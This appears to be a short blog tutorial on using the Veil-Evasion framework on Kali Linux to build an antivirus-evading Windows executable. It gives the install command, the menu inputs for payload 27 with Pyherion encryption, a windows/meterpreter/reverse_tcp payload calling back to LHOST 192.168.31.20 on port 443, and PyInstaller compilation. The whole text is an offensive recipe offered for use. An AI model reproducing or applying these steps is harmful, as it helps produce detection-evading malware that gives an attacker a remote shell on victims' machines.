BYPASSING ANTIVIRUS USING VEIL-FRAMEWORK

BYPASSING ANTIVIRUS USING VEIL-FRAMEWORK

Veil is a Python program that attempts to automate the creation of AV-evading payloads in a new framework.
Veil-Evasion is a tool which generate payload executable that bypass common antivirus solutions by creating each payload with randomness.
Installing Veil

USING KALI OR BACKTRACK

kali download link:

• To install just type, “apt-get update && then apt-get install veil”
• To run the program open a terminal and just type, “veil-evasion”

And this will bring you to the main menu.

Then type command “list” to obtain a list of available payload:

[>] Please enter a command: use 27

[>] Please enter a command: set use_pyherion  Y

[>] Please enter a command: generate

Then wait while the shellcode is been generated.

Now we are going to select msfvenom by typing “1”

[>] Please enter the number of your choice :  1

Enter metasploit payload: “windows/meterpreter/reverse_tcp”

 Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”

 Enter value for ‘LPORT': “443”

We need to press enter and then Veil requests us the name of our payload. In this case “payload”. We can write any name depending on us.

We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type “1”.

[>] Please enter the number of your choice :  1

And then press enter.

In the end, we can get our executable at “/root/Veil-output/compiled/

The Python programmers reading this will certainly appreciate the source code that is produced. Look at this beautiful hot mess of a program! All the variable names are randomized. The payloads are encrypted and encoded.